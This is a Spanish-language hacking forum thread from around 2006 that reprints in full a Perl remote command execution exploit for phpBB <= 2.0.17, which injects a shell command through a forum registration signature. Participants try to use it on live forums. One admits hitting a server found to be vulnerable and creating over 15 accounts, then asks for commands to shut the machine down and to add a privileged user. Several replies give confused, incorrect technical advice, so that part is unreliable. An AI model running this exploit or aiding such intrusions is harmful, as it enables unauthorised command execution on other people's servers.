Una pregunta sobre Remote command execution exploit

Holas

Alguien sabe explotar esto? o sea no es compilar y listo. Yo quiero saber como puedo aprobechar esto para conseguir algo.

Despues de ejecutar consigo esto, pero nada no pasa, intente entrar como root sin pass pero no funciona...

Código:

C:\>perl bug17.pl http://forophpbbversion2017/ webmaster ALL = (root) NOPASSWD:
tc/init.d/apache2
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PhpBB <= 2.0.17, PHP 5 < 5.0.5 remote command execution exploit by RST/GHC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Done. User bill23023 successfully registered!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit Original:

Código:

#!/usr/bin/perl

# phpBB <= 2.0.17 remote command execution exploit
# need for work:
# 1. PHP 5 < 5.0.5
# 2. register_globals=On
# 3. magic_quotes off
# ------------------------------------------------
# (c)oded by 1dt.w0lf
# RST/GHC
# http://rst.void.ru
# http://ghc.ru
# 03.11.05

use LWP::UserAgent;
use HTTP::Cookies;

if( @ARGV < 2) { usage(); }

head();

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();

for($i=0;$i<5;$i++)
{
$rand .= int(rand(9));
}

$name = 'bill'.$rand;
$password = 'r57phpBB2017xpl'.$rand;
$path = $ARGV[0];
$cmd = $ARGV[1];
$xpl->cookie_jar( $cookie_jar );

$res = $xpl->post(
$path.'profile.php?GLOBALS[signature_bbcode_uid]=(.%2B)/e%00',

Content => [
'username' => $name,
'email' => $rand.'_bill_gates @microsoft.com',
'new_password' => $password,
'password_confirm' => $password,
'signature' => 'r57:`'.$cmd.'`',
'viewemail' => '0',
'hideonline' => '1',
'notifyreply' => '0',
'notifypm' => '0',
'popup_pm' => '0',
'attachsig' => '0',
'allowbbcode' => '1',
'allowhtml' => '1',
'allowsmilies' => '0',
'mode' => 'register',
'agreed' => 'true',
'coppa' => '0',
'submit' => 'Submit',
],
);

if($res->content =~ /form action=\"profile.php/) { print "Failed to register user $name\r\n"; exit(); }
else { print "Done. User $name successfully registered!\r\n"; }

$res = $xpl->post(
$path.'login.php',
Content => [
'username' => $name,
'password' => $password,
'redirect' => '',
'login' => 'Log in',
],Referer => $path.'login.php');

$res = $xpl->get($path.'profile.php?mode=editprofile');
@content = split("\n",$res->content);
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
for( @content)
{
if(/<\/textarea>/) { $p = 0; }
print $_."\r\n" if $p;
if(/<textarea name="signature"/){ $p = 1; }
}
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

sub head()
{
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
print " PhpBB <= 2.0.17, PHP 5 < 5.0.5 remote command execution exploit by RST/GHC\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
}

sub usage()
{
head();
print " Usage: r57phpBB2017.pl <path> <cmd>\r\n";
print " <path> - Path to forum e.g. http://phpbb.com/forum/\r\n";
print " <cmd> - Command for execute\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
print "(c)oded by 1dt.w0lf , RST/GHC , http://rst.void.ru , http://ghc.ru\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
exit();
}

# milw0rm.com [2005-12-24]

mmmmmm me huele a troyano..

y si te fijas en e mismo codigo sale user y pass

$name = 'bill'.$rand;
$password = 'r57phpBB2017xpl'.$rand;

talves te podria servir...
pero me lo detecto malioso... mmmmmmmmmmmmmmmmmmmmmmmmmmmmm Sad

yo no veo ninguna parte malisioso....

$name = 'bill'.$rand;
$password = 'r57phpBB2017xpl'.$rand;

es el user y pass para registrar un usuario en el foro de la victima..

lo que yo no se, como se usa los comandos que supuestamente se puede ejecutar...

el nod32 me detecto troyano por eso te digo, y no creo que el nod lo invente..

Cita de: OzX en ſeptiembre 06, 2006, 10:00:22

el nod32 me detecto troyano por eso te digo, y no creo que el nod lo invente..

Si que lo inventa, nod32 y cualquier otro antivirus.

Saludos

yo se que crea una cuenta nueva, pero a mi no me importa eso, y no se para que sirve...

xq dice

# phpBB <= 2.0.17 remote command execution exploit

entonces supuestamente puedo ejecutar comandos remotos... pero no me funciona o no se como usarlas...

lei bien el exploit, y hay una parte donde dice

$cmd = $ARGV[1];

y mas abajo
'signature' => 'r57:`'.$cmd.'`',

nose para que hiso esto....

x cierto estoy creando mas de 15 cuentas en esa pagina por solo probar Grin

Si lo piensas cada vez que estas creando una cuentra estas realizando un remote command exploit... Esto no quiere decir que puedas realizar todos los comandos remotamente, este en si se peude... Te da acceso admin y te da todo, que mas quieres?? Ahora que eres admin no tienes mas que ir a la web y realizar los comandos en la misma web como administrados... SAlu2

Cita de: sickness1 en ſeptiembre 07, 2006, 08:51:45

te equivocas, no se registra como admin. el exploit es realizar una ejecucion de un comando al registrarse....

salu2

He estado mirando sobre el exploit y he visto que para que funcione requiere de tener una version 5 cuando la mayoria de los servidores utilizan la 4, ya que es mas estable, el registrar el usuario tiende a funcionar, el register global normalmente esta activado y las magic quotes default viene activado pero puede variar... En conclusion este exploit tiene bastantes limitaciones ya que requiere de unas expecificaciones muy exactas para funcionar y es posible que no te ejecute comandos debido a ello... Salu2

Cita de: sickness1 en ſeptiembre 08, 2006, 04:11:21

es cierto lo que decir, pero igual encontre un servidor que es vulnerable a esta tecnica....
pero no estoy consiguiendo nada... o sea que no se usar mejor dicho... :-\

esto es lo que me sale...

trata de usar esto
perl r57phpBB2017.pl <path> <cmd>\r\n";

a ver si asi te cambia algo... No se si lo habras hecho ya! Salu2

Cita de: sickness1 en ſeptiembre 10, 2006, 07:02:29

trata de usar esto
perl r57phpBB2017.pl <path> <cmd>\r\n";

a ver si asi te cambia algo... No se si lo habras hecho ya! Salu2

gracias man, pero igual no funk... puede ser que se ejecute pero no sale en la pantalla, alguien me puede dar un comando para apagar la PC en linux? xq el de windows ya lo intente.

salu2

Podrias compilar 2 archivos uno con esta linea de commando
if( @ARGV < 2) { usage(); }

y otra con

if( @ARGV > 1 ) { usage(); }
Para que utilice la parte de usage(); Que es desde donde se ejecutan los commandos.... Aunq me da la impresion que algo esta fallando en ese programa... Salu2

gracias man x tu respuesta.... Cheesy

pero la verdad que no pasa nada Embarrassed

salu2

otra pregunta....

como yo podria agregar user en LINUX? y como cambiar el privilegio de ese user todo en modo consola?

salu2

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Agosto 21, 2008, 12:38:48 Boton Buscar